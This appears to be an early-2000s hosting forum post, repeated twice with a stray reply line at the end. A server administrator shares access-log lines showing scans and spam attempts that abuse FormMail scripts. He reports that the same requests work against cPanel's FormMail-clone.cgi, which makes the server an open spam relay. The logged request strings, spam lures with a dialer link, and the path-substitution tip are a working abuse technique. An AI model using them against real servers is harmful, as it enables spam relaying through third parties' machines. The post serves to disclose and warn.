Hi all,
this belongs to \"Backend/Scripts\" but it is too serious to hide it there.
While studying the logs of the main account of my dedicated server, I noticed some kind kind of automat scanning for /cgi-bin/formmail.pl (I am referring to the old Analog reporting):
66: : Jan/13/02 10:19 AM: /cgi-bin/formmail.pl?email=&[email protected]&subject=P80+<my_ip_here>+35
54: : Nov/ 2/01 9:03 AM: /cgi-bin/[email protected]&[email protected]&subject=<domain_name_here>/cgi-bin/formmail.pl&msg=Hiya
35: : Jan/ 7/02 2:42 AM: /cgi-bin/[email protected]&subject=<another_domain_name_here>/cgi-bin/formmail.pl&[email protected]&msg=testing
30: : Oct/11/01 11:33 AM: /cgi-bin/[email protected]&[email protected]&subject=<some_other_domain_name_here>/cgi-bin/formmail.pl&msg=scanning
28: : Oct/31/01 6:59 PM: /cgi-bin/[email protected]&[email protected]&subject=<yet_another_domain_name_here>/cgi-bin/formmail.pl&msg=scanning
and so on, and so on (hundreds of them).
Some of them directly try to send:
13: : Jan/ 1/02 1:47 AM: /cgi-bin/[email protected]&[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]&subject=Download The Napster Of Porn!&message=You+Have+Won+a+Free+Membership+To+Any+Of+The+Following+Sites:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Girl+Ranch++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Beaver+Palace++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Jungle+Girls+++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Teen+Factory
13: : Jan/ 1/02 12:26 AM: /cgi-bin/[email protected]&[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]&subject=FREE XXX PORN!&message=You+Have+Won+a+Free+Membership+To+Any+Of+The+Following+Sites:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Girl+Ranch++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Beaver+Palace++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Jungle+Girls+++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Teen+Factory
13: : Jan/ 1/02 12:29 AM: /cgi-bin/[email protected]&[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]&subject=View My Webcam!&message=Want+instant+access+to+thousands+of+high+quality+adult+movies?++We\'ve+got+celebrities,+lesbians,+hardcore,+fetish,+gay,+or+whatever+you+want.++You+don\'t+even+need+a+credit+card,+just+a+connection+to+the+internet.+http://209.202.218.10/dc/dialer+-+Click+here+to+download+the+napster+of+hardcore+entertainment!
I have then tried one of the last lines with /cgi-sys/FormMail-clone.cgi AND IT WORKS! The spam is being sent through my own server! So, it is a matter of weeks, maybe months and the spammers WILL know, that they just have
to replace /cgi-bin/formmail.pl with /cgi-sys/FormMail-clone.cgi and they will be able to spam throu any CPanel machine.
As far as I know, there is a more secure version of formmail, checking if the requesting document is stored on the server before proceeding with sending the email. Anybody knows for sure? Has anybody else noticed this kind of spam attack?
kosmo
this belongs to \"Backend/Scripts\" but it is too serious to hide it there.
While studying the logs of the main account of my dedicated server, I noticed some kind kind of automat scanning for /cgi-bin/formmail.pl (I am referring to the old Analog reporting):
66: : Jan/13/02 10:19 AM: /cgi-bin/formmail.pl?email=&[email protected]&subject=P80+<my_ip_here>+35
54: : Nov/ 2/01 9:03 AM: /cgi-bin/[email protected]&[email protected]&subject=<domain_name_here>/cgi-bin/formmail.pl&msg=Hiya
35: : Jan/ 7/02 2:42 AM: /cgi-bin/[email protected]&subject=<another_domain_name_here>/cgi-bin/formmail.pl&[email protected]&msg=testing
30: : Oct/11/01 11:33 AM: /cgi-bin/[email protected]&[email protected]&subject=<some_other_domain_name_here>/cgi-bin/formmail.pl&msg=scanning
28: : Oct/31/01 6:59 PM: /cgi-bin/[email protected]&[email protected]&subject=<yet_another_domain_name_here>/cgi-bin/formmail.pl&msg=scanning
and so on, and so on (hundreds of them).
Some of them directly try to send:
13: : Jan/ 1/02 1:47 AM: /cgi-bin/[email protected]&[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]&subject=Download The Napster Of Porn!&message=You+Have+Won+a+Free+Membership+To+Any+Of+The+Following+Sites:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Girl+Ranch++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Beaver+Palace++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Jungle+Girls+++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Teen+Factory
13: : Jan/ 1/02 12:26 AM: /cgi-bin/[email protected]&[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]&subject=FREE XXX PORN!&message=You+Have+Won+a+Free+Membership+To+Any+Of+The+Following+Sites:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Girl+Ranch++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Beaver+Palace++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Jungle+Girls+++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Teen+Factory
13: : Jan/ 1/02 12:29 AM: /cgi-bin/[email protected]&[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]&subject=View My Webcam!&message=Want+instant+access+to+thousands+of+high+quality+adult+movies?++We\'ve+got+celebrities,+lesbians,+hardcore,+fetish,+gay,+or+whatever+you+want.++You+don\'t+even+need+a+credit+card,+just+a+connection+to+the+internet.+http://209.202.218.10/dc/dialer+-+Click+here+to+download+the+napster+of+hardcore+entertainment!
I have then tried one of the last lines with /cgi-sys/FormMail-clone.cgi AND IT WORKS! The spam is being sent through my own server! So, it is a matter of weeks, maybe months and the spammers WILL know, that they just have
to replace /cgi-bin/formmail.pl with /cgi-sys/FormMail-clone.cgi and they will be able to spam throu any CPanel machine.
As far as I know, there is a more secure version of formmail, checking if the requesting document is stored on the server before proceeding with sending the email. Anybody knows for sure? Has anybody else noticed this kind of spam attack?
kosmo
But you are right the problem is in the clone as well.